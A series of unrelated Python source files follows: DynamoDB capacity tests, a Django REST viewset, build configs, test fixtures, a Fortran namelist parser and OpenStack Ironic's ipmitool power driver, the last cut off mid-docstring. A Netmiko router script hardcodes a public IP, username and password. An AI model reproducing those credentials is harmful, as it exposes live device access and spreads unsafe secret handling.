    # PUT_ITEM
    args = {"Item": item}
    if capacity:
        args["ReturnConsumedCapacity"] = capacity
    response = table.put_item(**args)
    validate_response(response, should_have_capacity, should_have_table)

    # GET_ITEM
    args = {"Key": item}
    if capacity:
        args["ReturnConsumedCapacity"] = capacity
    response = table.get_item(**args)
    validate_response(response, should_have_capacity, should_have_table, value=0.5)

    # SCAN
    args = {"TableName": "jobs"}
    if capacity:
        args["ReturnConsumedCapacity"] = capacity
    response = client.scan(**args)
    validate_response(response, should_have_capacity, should_have_table)

    # SCAN_INDEX
    args["IndexName"] = "job_name-index"
    response = client.scan(**args)
    validate_response(response, should_have_capacity, should_have_table, is_index=True)

    # QUERY
    args = {
        "TableName": "jobs",
        "KeyConditionExpression": "job_id = :id",
        "ExpressionAttributeValues": {":id": {"S": "asdasdasd"}},
    }
    if capacity:
        args["ReturnConsumedCapacity"] = capacity
    response = client.query(**args)
    validate_response(response, should_have_capacity, should_have_table)

    # QUERY_INDEX
    args["IndexName"] = "job_name-index"
    response = client.query(**args)
    validate_response(response, should_have_capacity, should_have_table, is_index=True)


def validate_response(
    response, should_have_capacity, should_have_table, is_index=False, value=1.0
):
    if should_have_capacity:
        response.should.have.key("ConsumedCapacity")
        response["ConsumedCapacity"]["TableName"].should.equal("jobs")
        response["ConsumedCapacity"]["CapacityUnits"].should.equal(value)
        if should_have_table:
            response["ConsumedCapacity"]["Table"].should.equal({"CapacityUnits": value})
            if is_index:
                response["ConsumedCapacity"].should.have.key("LocalSecondaryIndexes")
                response["ConsumedCapacity"]["LocalSecondaryIndexes"].should.equal(
                    {"job_name-index": {"CapacityUnits": value}}
                )
    else:
        response.shouldnt.have.key("ConsumedCapacity")

from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.decorators import action
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet

from rdmo.core.exports import XMLResponse
from rdmo.core.permissions import HasModelPermission
from rdmo.core.views import ChoicesViewSet
from rdmo.core.viewsets import CopyModelMixin

from .models import Condition
from .renderers import ConditionRenderer
from .serializers.export import ConditionExportSerializer
from .serializers.v1 import ConditionIndexSerializer, ConditionSerializer


class ConditionViewSet(CopyModelMixin, ModelViewSet):
    permission_classes = (HasModelPermission, )
    queryset = Condition.objects.select_related('source', 'target_option') \
                                .prefetch_related('optionsets', 'questionsets', 'questions', 'tasks')
    serializer_class = ConditionSerializer

    filter_backends = (DjangoFilterBackend,)
    filterset_fields = (
        'uri',
        'key',
        'source',
        'relation',
        'target_text',
        'target_option'
    )

    @action(detail=False)
    def index(self, request):
        queryset = Condition.objects.select_related('source', 'target_option')
        serializer = ConditionIndexSerializer(queryset, many=True)
        return Response(serializer.data)

    @action(detail=False, permission_classes=[HasModelPermission])
    def export(self, request):
        serializer = ConditionExportSerializer(self.get_queryset(), many=True)
        xml = ConditionRenderer().render(serializer.data)
        return XMLResponse(xml, name='conditions')

    @action(detail=True, url_path='export', permission_classes=[HasModelPermission])
    def detail_export(self, request, pk=None):
        serializer = ConditionExportSerializer(self.get_object())
        xml = ConditionRenderer().render([serializer.data])
        return XMLResponse(xml, name=self.get_object().key)


class RelationViewSet(ChoicesViewSet):
    permission_classes = (IsAuthenticated, )
    queryset = Condition.RELATION_CHOICES

#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
'fbcode_builder steps to build Facebook Thrift'

import specs.fbthrift as fbthrift


def fbcode_builder_spec(builder):
    return {
        'depends_on': [fbthrift],
    }


config = {
    'github_project': 'facebook/fbthrift',
    'fbcode_builder_spec': fbcode_builder_spec,
}

def emptyLayout(layout):
    for i in reversed(range(layout.count())):
        layout.itemAt(i).widget().setParent(None)

# Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0

from django.test.utils import override_settings
from sis_provisioner.tests import (
    fdao_pws_override, fdao_hrp_override, fdao_bridge_override)
from sis_provisioner.tests.account_managers import set_uw_account

user_file_name_override = override_settings(
    BRIDGE_IMPORT_USER_FILENAME="users")


def set_db_records():
    affiemp = set_uw_account("affiemp")

    javerage = set_uw_account("javerage")

    ellen = set_uw_account("ellen")

    staff = set_uw_account("staff")
    staff.set_disable()

    retiree = set_uw_account("retiree")

    tyler = set_uw_account("faculty")

    leftuw = set_uw_account("leftuw")
    leftuw.set_terminate_date()

    testid = set_uw_account("testid")

import eventlet
import gettext
import sys

from staccato.common import config
import staccato.openstack.common.wsgi as os_wsgi
import staccato.openstack.common.pastedeploy as os_pastedeploy

# Monkey patch socket and time
eventlet.patcher.monkey_patch(all=False, socket=True, time=True)

gettext.install('staccato', unicode=1)


def fail(returncode, e):
    sys.stderr.write("ERROR: %s\n" % e)
    sys.exit(returncode)


def main():
    try:
        conf = config.get_config_object()
        paste_file = conf.find_file(conf.paste_deploy.config_file)
        wsgi_app = os_pastedeploy.paste_deploy_app(paste_file,
                                                   'staccato-api',
                                                   conf)
        server = os_wsgi.Service(wsgi_app, conf.bind_port)
        server.start()
        server.wait()
    except RuntimeError as e:
        fail(1, e)

main()

#!/usr/bin/env python

# Use Netmiko to execute 'show arp' on pynet-rtr1, pynet-rtr2, and juniper-srx.

from netmiko import ConnectHandler

def main():

    # Definition of routers
    rtr1 = {
        'device_type': 'cisco_ios',
        'ip':   '50.76.53.27',
        'username': 'pyclass',
        'password': '88newclass',
    }

    rtr2 = {
        'device_type': 'cisco_ios',
        'ip':   '50.76.53.27',
        'username': 'pyclass',
        'password': '88newclass',
        'port': 8022,
    }

    srx = {
        'device_type': 'juniper',
        'ip':   '50.76.53.27',
        'username': 'pyclass',
        'password': '88newclass',
        'port': 9822,
    }
    
    # Create a list of all the routers.
    all_routers = [rtr1, rtr2, srx]

    # Loop through all the routers and show arp.
    for a_router in all_routers:
        net_connect = ConnectHandler(**a_router)
        output = net_connect.send_command("show arp")
        print "\n\n>>>>>>>>> Device {0} <<<<<<<<<".format(a_router['device_type'])
        print output
        print ">>>>>>>>> End <<<<<<<<<"

if __name__ == "__main__":
    main()


""" IO classes for Omnivor input file

Copyright (C) 2013 DTU Wind Energy

Author: Emmanuel Branlard
Email: ebra@dtu.dk
Last revision: 25/11/2013

Namelist IO: badis functions to read and parse a fortran file into python dictonary and write it back to a file 
The parser was adapted from: fortran-namelist on code.google with the following info:
                __author__ = 'Stephane Chamberland (stephane.chamberland@ec.gc.ca)'
                __version__ = '$Revision: 1.0 $'[11:-2]
                __date__ = '$Date: 2006/09/05 21:16:24 $'
                __copyright__ = 'Copyright (c) 2006 RPN'
                __license__ = 'LGPL'

Recognizes files of the form:
&namelistname
    opt1 = value1
    ...
/
"""

from __future__ import print_function
from we_file_io import WEFileIO, TestWEFileIO
import unittest

import numpy as np
import os.path as path

import sys
import re
import tempfile
import os

__author__ = 'E. Branlard '
class FortranNamelistIO(WEFileIO):
    """
    Fortran Namelist IO class
    Scan a Fortran Namelist file and put Section/Parameters into a dictionary
    Write the file back if needed.
    """
    def _write(self):
        """ Write a file (overrided)
        """
        with open(self.filename, 'w') as f:
            for nml in self.data :
                f.write('&'+nml+'\n')

                # Sorting dictionary data (in the same order as it was created, thanks to id)
                SortedList = sorted(self.data[nml].items(), key=lambda(k, v): v['id'])

#                 for param in self.data[nml]:
                for param in map(lambda(k,v):k,SortedList):
                    f.write(param+'='+','.join(self.data[nml][param]['val']))
                    if len(self.data[nml][param]['com']) >0:
                        f.write(' !'+self.data[nml][param]['com'])
                    f.write('\n')
                f.write('/\n')

    def _read(self):
        """ Read the file (overrided)
        """
        with open(self.filename, 'r') as f:
            data = f.read()

        varname   = r'\b[a-zA-Z][a-zA-Z0-9_]*\b'
        valueInt  = re.compile(r'[+-]?[0-9]+')
        valueReal = re.compile(r'[+-]?([0-9]+\.[0-9]*|[0-9]*\.[0-9]+)')
        valueNumber = re.compile(r'\b(([\+\-]?[0-9]+)?\.)?[0-9]*([eE][-+]?[0-9]+)?')
        valueBool = re.compile(r"(\.(true|false|t|f)\.)",re.I)
        valueTrue = re.compile(r"(\.(true|t)\.)",re.I)
        spaces = r'[\s\t]*'
        quote = re.compile(r"[\s\t]*[\'\"]")

        namelistname = re.compile(r"^[\s\t]*&(" + varname + r")[\s\t]*$")
        paramname = re.compile(r"[\s\t]*(" + varname+r')[\s\t]*=[\s\t]*')
        namlistend = re.compile(r"^" + spaces + r"/" + spaces + r"$")

        #split sections/namelists
        mynmlfile    = {}
        mynmlfileRaw = {}
        mynmlname  = ''
        for item in FortranNamelistIO.clean(data.split("\n"),cleancomma=1):
            if re.match(namelistname,item):
                mynmlname = re.sub(namelistname,r"\1",item)
                mynmlfile[mynmlname] = {}
                mynmlfileRaw[mynmlname] = []
            elif re.match(namlistend,item):
                mynmlname = ''
            else:
                if mynmlname:
                    mynmlfileRaw[mynmlname].append(item)

        #parse param in each section/namelist
        for mynmlname in mynmlfile.keys():
            #split strings
            bb = []
            for item in mynmlfileRaw[mynmlname]:
                if item[0]!='!':
                    # discarding lines that starts with a comment
                    bb.extend(FortranNamelistIO.splitstring(item))
            #split comma and =
            aa = []
            for item in bb:
                if not re.match(quote,item):
                    aa.extend(re.sub(r"[\s\t]*=",r" =\n",re.sub(r",+",r"\n",item)).split("\n"))
#                     aa.extend(re.sub(r"[\s\t]*=",r" =\n",item).split("\n"))
                else:
                    aa.append(item)
            del(bb)
            aa = FortranNamelistIO.clean(aa,cleancomma=1)

            myparname  = ''
            id_cum=0
            for item in aa:
                if re.search(paramname,item):
                    #myparname  = re.sub(paramname,r"\1",item).lower() ! NO MORE LOWER CASE
                    myparname  = re.sub(paramname,r"\1",item)
                    id_cum=id_cum+1
                    mynmlfile[mynmlname][myparname] = {
                    'val' : [],
                    'id' : id_cum,
                    'com' : ''
                    }
                elif paramname:
                    # Storing comments
                    item2=item.split('!')
                    item=item2[0]
                    if len(item) > 1 :
                        mynmlfile[mynmlname][myparname]['com']=''.join(item2[1:])
                    if re.match(valueBool,item):
                        if re.match(valueTrue,item):
                            mynmlfile[mynmlname][myparname]['val'].append('.true.')
                        else:
                            mynmlfile[mynmlname][myparname]['val'].append('.false.')
                    else:
#                         item2=re.sub(r"(^[\'\"]|[\'\"]$)",r"",item.strip())
                        mynmlfile[mynmlname][myparname]['val'].append(item.strip())
                self.data=mynmlfile


    # Accessor and mutator dictionary style
    def __getitem__(self, key):
        """ Transform the class instance into a dictionary."""
        return self.data[key]

    def __setitem__(self, key, value):
        """ Transform the class instance into a dictionary."""
        self.data[key] = value



    #==== Helper functions for Parsing of files
    @staticmethod
    def clean(mystringlist,commentexpr=r"^[\s\t]*\#.*$",spacemerge=0,cleancomma=0):
        """
        Remove leading and trailing blanks, comments/empty lines from a list of strings
        mystringlist = foo.clean(mystringlist,spacemerge=0,commentline=r"^[\s\t]*\#",cleancharlist="")
            commentline: definition of commentline
            spacemerge: if <>0, merge/collapse multi space
            cleancomma: Remove leading and trailing commas
        """
        aa = mystringlist
        if cleancomma:
            aa = [re.sub("(^([\s\t]*\,)+)|((\,[\s\t]*)+$)","",item).strip() for item in aa]
        if commentexpr:
            aa = [re.sub(commentexpr,"",item).strip() for item in aa]
        if spacemerge:
            aa = [re.sub("[\s\t]+"," ",item).strip() for item in aa if len(item.strip()) <> 0]
        else:
            aa = [item.strip() for item in aa if len(item.strip()) <> 0]
        return aa

    @staticmethod
    def splitstring(mystr):
        """
        Split a string in a list of strings at quote boundaries
            Input: String
            Output: list of strings
        """
        dquote=r'(^[^\"\']*)(\"[^"]*\")(.*)$'
        squote=r"(^[^\"\']*)(\'[^']*\')(.*$)"
        mystrarr = re.sub(dquote,r"\1\n\2\n\3",re.sub(squote,r"\1\n\2\n\3",mystr)).split("\n")
        #remove zerolenght items
        mystrarr = [item for item in mystrarr if len(item) <> 0]
        if len(mystrarr) > 1:
            mystrarr2 = []
            for item in mystrarr:
                mystrarr2.extend(FortranNamelistIO.splitstring(item))
            mystrarr = mystrarr2
        return mystrarr

## Do Some testing -------------------------------------------------------
class TestFortranNamelist(TestWEFileIO):
    """ Test class for MyFileType class """

    test_file = './test/fortran/fortran_namelist.nml'

    def test_output_identical(self):
        InputFile=FortranNamelistIO(self.test_file)
        test_fileout=tempfile.mkstemp()[1]
        InputFile.write(test_fileout)

        with open(self.test_file, 'r') as f:
            data_expected = f.read()

        with open(test_fileout, 'r') as f:
            data_read = f.read()
        try:
            self.assertMultiLineEqual(data_read, data_expected)
        finally:
            os.remove(test_fileout)


    def test_duplication(self):
        self._test_duplication(FortranNamelistIO, self.test_file)


## Main function ---------------------------------------------------------
if __name__ == '__main__':
    """ This is the main fuction that will run the tests automatically
    """
    unittest.main()

# coding=utf-8

# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 NTT DOCOMO, INC.
# Copyright 2014 International Business Machines Corporation
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""
IPMI power manager driver.

Uses the 'ipmitool' command (http://ipmitool.sourceforge.net/) to remotely
manage hardware.  This includes setting the boot device, getting a
serial-over-LAN console, and controlling the power state of the machine.

NOTE THAT CERTAIN DISTROS MAY INSTALL openipmi BY DEFAULT, INSTEAD OF ipmitool,
WHICH PROVIDES DIFFERENT COMMAND-LINE OPTIONS AND *IS NOT SUPPORTED* BY THIS
DRIVER.
"""

import contextlib
import os
import re
import subprocess
import tempfile
import time

from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils

from ironic.common import boot_devices
from ironic.common import exception
from ironic.common.i18n import _
from ironic.common.i18n import _LE
from ironic.common.i18n import _LI
from ironic.common.i18n import _LW
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.drivers import base
from ironic.drivers.modules import console_utils


CONF = cfg.CONF
CONF.import_opt('retry_timeout',
                'ironic.drivers.modules.ipminative',
                group='ipmi')
CONF.import_opt('min_command_interval',
                'ironic.drivers.modules.ipminative',
                group='ipmi')

LOG = logging.getLogger(__name__)

VALID_PRIV_LEVELS = ['ADMINISTRATOR', 'CALLBACK', 'OPERATOR', 'USER']

VALID_PROTO_VERSIONS = ('2.0', '1.5')

REQUIRED_PROPERTIES = {
    'ipmi_address': _("IP address or hostname of the node. Required.")
}
OPTIONAL_PROPERTIES = {
    'ipmi_password': _("password. Optional."),
    'ipmi_priv_level': _("privilege level; default is ADMINISTRATOR. One of "
                         "%s. Optional.") % ', '.join(VALID_PRIV_LEVELS),
    'ipmi_username': _("username; default is NULL user. Optional."),
    'ipmi_bridging': _("bridging_type; default is \"no\". One of \"single\", "
                       "\"dual\", \"no\". Optional."),
    'ipmi_transit_channel': _("transit channel for bridged request. Required "
                              "only if ipmi_bridging is set to \"dual\"."),
    'ipmi_transit_address': _("transit address for bridged request. Required "
                              "only if ipmi_bridging is set to \"dual\"."),
    'ipmi_target_channel': _("destination channel for bridged request. "
                             "Required only if ipmi_bridging is set to "
                             "\"single\" or \"dual\"."),
    'ipmi_target_address': _("destination address for bridged request. "
                             "Required only if ipmi_bridging is set "
                             "to \"single\" or \"dual\"."),
    'ipmi_local_address': _("local IPMB address for bridged requests. "
                            "Used only if ipmi_bridging is set "
                            "to \"single\" or \"dual\". Optional."),
    'ipmi_protocol_version': _('the version of the IPMI protocol; default '
                               'is "2.0". One of "1.5", "2.0". Optional.'),
}
COMMON_PROPERTIES = REQUIRED_PROPERTIES.copy()
COMMON_PROPERTIES.update(OPTIONAL_PROPERTIES)
CONSOLE_PROPERTIES = {
    'ipmi_terminal_port': _("node's UDP port to connect to. Only required for "
                            "console access.")
}
BRIDGING_OPTIONS = [('local_address', '-m'),
                    ('transit_channel', '-B'), ('transit_address', '-T'),
                    ('target_channel', '-b'), ('target_address', '-t')]

LAST_CMD_TIME = {}
TIMING_SUPPORT = None
SINGLE_BRIDGE_SUPPORT = None
DUAL_BRIDGE_SUPPORT = None
TMP_DIR_CHECKED = None

ipmitool_command_options = {
    'timing': ['ipmitool', '-N', '0', '-R', '0', '-h'],
    'single_bridge': ['ipmitool', '-m', '0', '-b', '0', '-t', '0', '-h'],
    'dual_bridge': ['ipmitool', '-m', '0', '-b', '0', '-t', '0',
                    '-B', '0', '-T', '0', '-h']}

# Note(TheJulia): This string is hardcoded in ipmitool's lanplus driver
# and is substituted in return for the error code received from the IPMI
# controller.  As of 1.8.15, no internationalization support appears to
# be in ipmitool which means the string should always be returned in this
# form regardless of locale.
IPMITOOL_RETRYABLE_FAILURES = ['insufficient resources for session']


def _check_option_support(options):
    """Checks if the specific ipmitool options are supported on host.

    This method updates the module-level variables indicating whether
    an option is supported so that it is accessible by any driver
    interface class in this module. It is intended to be called from
    the __init__ method of such classes only.

    :param options: list of ipmitool options to be checked
    :raises: OSError
    """
    for opt in options:
        if _is_option_supported(opt) is None:
            try:
                cmd = ipmitool_command_options[opt]
                # NOTE(cinerama): use subprocess.check_call to
                # check options & suppress ipmitool output to
                # avoid alarming people
                with open(os.devnull, 'wb') as nullfile:
                    subprocess.check_call(cmd, stdout=nullfile,
                                          stderr=nullfile)
            except subprocess.CalledProcessError:
                LOG.info(_LI("Option %(opt)s is not supported by ipmitool"),
                         {'opt': opt})
                _is_option_supported(opt, False)
            else:
                LOG.info(_LI("Option %(opt)s is supported by ipmitool"),
                         {'opt': opt})
                _is_option_supported(opt, True)


def _is_option_supported(option, is_supported=None):
    """Indicates whether the particular ipmitool option is supported.

    :param option: specific ipmitool option
    :param is_supported: Optional Boolean. when specified, this value
                         is assigned to the module-level variable indicating
                         whether the option is supported. Used only if a value
                         is not already assigned.
    :returns: True, indicates the option is supported
    :returns: False, indicates the option is not supported
    :returns: None, indicates that it is not aware whether the option
              is supported
    """
    global SINGLE_BRIDGE_SUPPORT
    global DUAL_BRIDGE_SUPPORT
    global TIMING_SUPPORT

    if option == 'single_bridge':
        if (SINGLE_BRIDGE_SUPPORT is None) and (is_supported is not None):
            SINGLE_BRIDGE_SUPPORT = is_supported
        return SINGLE_BRIDGE_SUPPORT
    elif option == 'dual_bridge':
        if (DUAL_BRIDGE_SUPPORT is None) and (is_supported is not None):
            DUAL_BRIDGE_SUPPORT = is_supported
        return DUAL_BRIDGE_SUPPORT
    elif option == 'timing':
        if (TIMING_SUPPORT is None) and (is_supported is not None):
            TIMING_SUPPORT = is_supported
        return TIMING_SUPPORT


def _console_pwfile_path(uuid):
    """Return the file path for storing the ipmi password for a console."""
    file_name = "%(uuid)s.pw" % {'uuid': uuid}
    return os.path.join(CONF.tempdir, file_name)


@contextlib.contextmanager
def _make_password_file(password):
    """Makes a temporary file that contains the password.

    :param password: the password
    :returns: the absolute pathname of the temporary file
    :raises: PasswordFileFailedToCreate from creating or writing to the
             temporary file
    """
    f = None
    try:
        f = tempfile.NamedTemporaryFile(mode='w', dir=CONF.tempdir)
        f.write(str(password))
        f.flush()
    except (IOError, OSError) as exc:
        if f is not None:
            f.close()
        raise exception.PasswordFileFailedToCreate(error=exc)
    except Exception:
        with excutils.save_and_reraise_exception():
            if f is not None:
                f.close()

    try:
        # NOTE(jlvillal): This yield can not be in the try/except block above
        # because an exception by the caller of this function would then get
        # changed to a PasswordFileFailedToCreate exception which would mislead
        # about the problem and its cause.
        yield f.name
    finally:
        if f is not None:
            f.close()


def _parse_driver_info(node):
    """Gets the parameters required for ipmitool to access the node.

    :param node: the Node of interest.
    :returns: dictionary of parameters.
    :raises: InvalidParameterValue when an invalid value is specified
    :raises: MissingParameterValue when a required ipmi parameter is missing.

    """
    info = node.driver_info or {}
    bridging_types = ['single', 'dual']
    missing_info = [key for key in REQUIRED_PROPERTIES if not info.get(key)]
    if missing_info:
        raise exception.MissingParameterValue(_(
            "Missing the following IPMI credentials in node's"
            " driver_info: %s.") % missing_info)

    address = info.get('ipmi_address')
    username = info.get('ipmi_username')
    password = info.get('ipmi_password')
    port = info.get('ipmi_terminal_port')
    priv_level = info.get('ipmi_priv_level', 'ADMINISTRATOR')
    bridging_type = info.get('ipmi_bridging', 'no')
    local_address = info.get('ipmi_local_address')
    transit_channel = info.get('ipmi_transit_channel')
    transit_address = info.get('ipmi_transit_address')
    target_channel = info.get('ipmi_target_channel')
    target_address = info.get('ipmi_target_address')
    protocol_version = str(info.get('ipmi_protocol_version', '2.0'))

    if protocol_version not in VALID_PROTO_VERSIONS:
        valid_versions = ', '.join(VALID_PROTO_VERSIONS)
        raise exception.InvalidParameterValue(_(
            "Invalid IPMI protocol version value %(version)s, the valid "
            "value can be one of %(valid_versions)s") %
            {'version': protocol_version, 'valid_versions': valid_versions})

    if port:
        try:
            port = int(port)
        except ValueError:
            raise exception.InvalidParameterValue(_(
                "IPMI terminal port is not an integer."))

    # check if ipmi_bridging has proper value
    if bridging_type == 'no':
        # if bridging is not selected, then set all bridging params to None
        (local_address, transit_channel, transit_address, target_channel,
         target_address) = (None,) * 5
    elif bridging_type in bridging_types:
        # check if the particular bridging option is supported on host
        if not _is_option_supported('%s_bridge' % bridging_type):
            raise exception.InvalidParameterValue(_(
                "Value for ipmi_bridging is provided as %s, but IPMI "
                "bridging is not supported by the IPMI utility installed "
                "on host. Ensure ipmitool version is > 1.8.11"
            ) % bridging_type)

        # ensure that all the required parameters are provided
        params_undefined = [param for param, value in [
            ("ipmi_target_channel", target_channel),
            ('ipmi_target_address', target_address)] if value is None]
        if bridging_type == 'dual':
            params_undefined2 = [param for param, value in [
                ("ipmi_transit_channel", transit_channel),
                ('ipmi_transit_address', transit_address)
            ] if value is None]
            params_undefined.extend(params_undefined2)
        else:
            # if single bridging was selected, set dual bridge params to None
            transit_channel = transit_address = None

        # If the required parameters were not provided,
        # raise an exception
        if params_undefined:
            raise exception.MissingParameterValue(_(
                "%(param)s not provided") % {'param': params_undefined})
    else:
        raise exception.InvalidParameterValue(_(
            "Invalid value for ipmi_bridging: %(bridging_type)s,"
            " the valid value can be one of: %(bridging_types)s"
        ) % {'bridging_type': bridging_type,
             'bridging_types': bridging_types + ['no']})

    if priv_level not in VALID_PRIV_LEVELS:
        valid_priv_lvls = ', '.join(VALID_PRIV_LEVELS)
        raise exception.InvalidParameterValue(_(
            "Invalid privilege level value:%(priv_level)s, the valid value"
            " can be one of %(valid_levels)s") %
            {'priv_level': priv_level, 'valid_levels': valid_priv_lvls})

    return {
        'address': address,
        'username': username,
        'password': password,
        'port': port,
        'uuid': node.uuid,
        'priv_level': priv_level,
        'local_address': local_address,
        'transit_channel': transit_channel,
        'transit_address': transit_address,
        'target_channel': target_channel,
        'target_address': target_address,
        'protocol_version': protocol_version,
    }


def _exec_ipmitool(driver_info, command):
    """Execute the ipmitool command.

    :param driver_info: the ipmitool parameters for accessing a node.
    :param command: the ipmitool command to be executed.
    :returns: (stdout, stderr) from executing the command.
    :raises: PasswordFileFailedToCreate from creating or writing to the
             temporary file.
    :raises: processutils.ProcessExecutionError from executing the command.

    """
    ipmi_version = ('lanplus'
                    if driver_info['protocol_version'] == '2.0'
                    else 'lan')
    args = ['ipmitool',
            '-I',
            ipmi_version,
            '-H',
            driver_info['address'],
            '-L', driver_info['priv_level']
            ]
    if driver_info['username']:
        args.append('-U')
        args.append(driver_info['username'])

    for name, option in BRIDGING_OPTIONS:
        if driver_info[name] is not None:
            args.append(option)
            args.append(driver_info[name])

    # specify retry timing more precisely, if supported
    num_tries = max(
        (CONF.ipmi.retry_timeout // CONF.ipmi.min_command_interval), 1)

    if _is_option_supported('timing'):
        args.append('-R')
        args.append(str(num_tries))

        args.append('-N')
        args.append(str(CONF.ipmi.min_command_interval))

    end_time = (time.time() + CONF.ipmi.retry_timeout)

    while True:
        num_tries = num_tries - 1
        # NOTE(deva): ensure that no communications are sent to a BMC more
        #             often than once every min_command_interval seconds.
        time_till_next_poll = CONF.ipmi.min_command_interval - (
            time.time() - LAST_CMD_TIME.get(driver_info['address'], 0))
        if time_till_next_poll > 0:
            time.sleep(time_till_next_poll)
        # Resetting the list that will be utilized so the password arguments
        # from any previous execution are preserved.
        cmd_args = args[:]
        # 'ipmitool' command will prompt password if there is no '-f'
        # option, we set it to '\0' to write a password file to support
        # empty password
        with _make_password_file(driver_info['password'] or '\0') as pw_file:
            cmd_args.append('-f')
            cmd_args.append(pw_file)
            cmd_args.extend(command.split(" "))
            try:
                out, err = utils.execute(*cmd_args)
                return out, err
            except processutils.ProcessExecutionError as e:
                with excutils.save_and_reraise_exception() as ctxt:
                    err_list = [x for x in IPMITOOL_RETRYABLE_FAILURES
                                if x in e.args[0]]
                    if ((time.time() > end_time) or
                        (num_tries == 0) or
                        not err_list):
                        LOG.error(_LE('IPMI Error while attempting "%(cmd)s"'
                                      'for node %(node)s. Error: %(error)s'), {
                                  'node': driver_info['uuid'],
                                  'cmd': e.cmd, 'error': e
                                  })
                    else:
                        ctxt.reraise = False
                        LOG.warning(_LW('IPMI Error encountered, retrying '
                                        '"%(cmd)s" for node %(node)s. '
                                        'Error: %(error)s'), {
                                    'node': driver_info['uuid'],
                                    'cmd': e.cmd, 'error': e
                                    })
            finally:
                LAST_CMD_TIME[driver_info['address']] = time.time()


def _sleep_time(iter):
    """Return the time-to-sleep for the n'th iteration of a retry loop.

    This implementation increases exponentially.

    :param iter: iteration number
    :returns: number of seconds to sleep

    """
    if iter <= 1:
        return 1
    return iter ** 2


def _set_and_wait(target_state, driver_info):
    """Helper function for DynamicLoopingCall.

    This method changes the power state and polls the BMCuntil the desired
    power state is reached, or CONF.ipmi.retry_timeout would be exceeded by the
    next iteration.

    This method assumes the caller knows the current power state and does not
    check it prior to changing the power state. Most BMCs should be fine, but
    if a driver is concerned, the state should be checked prior to calling this
    method.

    :param target_state: desired power state
    :param driver_info: the ipmitool parameters for accessing a node.
    :returns: one of ironic.common.states

    """
    if target_state == states.POWER_ON:
        state_name = "on"
    elif target_state == states.POWER_OFF:
        state_name = "off"

    def _wait(mutable):
        try:
            # Only issue power change command once
            if mutable['iter'] < 0:
                _exec_ipmitool(driver_info, "power %s" % state_name)
            else:
                mutable['power'] = _power_status(driver_info)
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError,
                exception.IPMIFailure):
            # Log failures but keep trying
            LOG.warning(_LW("IPMI power %(state)s failed for node %(node)s."),
                        {'state': state_name, 'node': driver_info['uuid']})
        finally:
            mutable['iter'] += 1

        if mutable['power'] == target_state:
            raise loopingcall.LoopingCallDone()

        sleep_time = _sleep_time(mutable['iter'])
        if (sleep_time + mutable['total_time']) > CONF.ipmi.retry_timeout:
            # Stop if the next loop would exceed maximum retry_timeout
            LOG.error(_LE('IPMI power %(state)s timed out after '
                          '%(tries)s retries on node %(node_id)s.'),
                      {'state': state_name, 'tries': mutable['iter'],
                       'node_id': driver_info['uuid']})
            mutable['power'] = states.ERROR
            raise loopingcall.LoopingCallDone()
        else:
            mutable['total_time'] += sleep_time
            return sleep_time

    # Use mutable objects so the looped method can change them.
    # Start 'iter' from -1 so that the first two checks are one second apart.
    status = {'power': None, 'iter': -1, 'total_time': 0}

    timer = loopingcall.DynamicLoopingCall(_wait, status)
    timer.start().wait()
    return status['power']


def _power_on(driver_info):
    """Turn the power ON for this node.

    :param driver_info: the ipmitool parameters for accessing a node.
    :returns: one of ironic.common.states POWER_ON or ERROR.
    :raises: IPMIFailure on an error from ipmitool (from _power_status call).

    """
    return _set_and_wait(states.POWER_ON, driver_info)


def _power_off(driver_info):
    """Turn the power OFF for this node.

    :param driver_info: the ipmitool parameters for accessing a node.
    :returns: one of ironic.common.states POWER_OFF or ERROR.
    :raises: IPMIFailure on an error from ipmitool (from _power_status call).

    """
    return _set_and_wait(states.POWER_OFF, driver_info)


def _power_status(driver_info):
    """Get the power status for a node.

    :param driver_info: the ipmitool access parameters for a node.
    :returns: one of ironic.common.states POWER_OFF, POWER_ON or ERROR.
    :raises: IPMIFailure on an error from ipmitool.

    """
    cmd = "power status"
    try:
        out_err = _exec_ipmitool(driver_info, cmd)
    except (exception.PasswordFileFailedToCreate,
            processutils.ProcessExecutionError) as e:
        LOG.warning(_LW("IPMI power status failed for node %(node_id)s with "
                        "error: %(error)s."),
                    {'node_id': driver_info['uuid'], 'error': e})
        raise exception.IPMIFailure(cmd=cmd)

    if out_err[0] == "Chassis Power is on\n":
        return states.POWER_ON
    elif out_err[0] == "Chassis Power is off\n":
        return states.POWER_OFF
    else:
        return states.ERROR


def _process_sensor(sensor_data):
    sensor_data_fields = sensor_data.split('\n')
    sensor_data_dict = {}
    for field in sensor_data_fields:
        if not field:
            continue
        kv_value = field.split(':')
        if len(kv_value) != 2:
            continue
        sensor_data_dict[kv_value[0].strip()] = kv_value[1].strip()

    return sensor_data_dict


def _get_sensor_type(node, sensor_data_dict):
    # Have only three sensor type name IDs: 'Sensor Type (Analog)'
    # 'Sensor Type (Discrete)' and 'Sensor Type (Threshold)'

    for key in ('Sensor Type (Analog)', 'Sensor Type (Discrete)',
                'Sensor Type (Threshold)'):
        try:
            return sensor_data_dict[key].split(' ', 1)[0]
        except KeyError:
            continue

    raise exception.FailedToParseSensorData(
        node=node.uuid,
        error=(_("parse ipmi sensor data failed, unknown sensor type"
                 " data: %(sensors_data)s"),
               {'sensors_data': sensor_data_dict}))


def _parse_ipmi_sensors_data(node, sensors_data):
    """Parse the IPMI sensors data and format to the dict grouping by type.

    We run 'ipmitool' command with 'sdr -v' options, which can return sensor
    details in human-readable format, we need to format them to JSON string
    dict-based data for Ceilometer Collector which can be sent it as payload
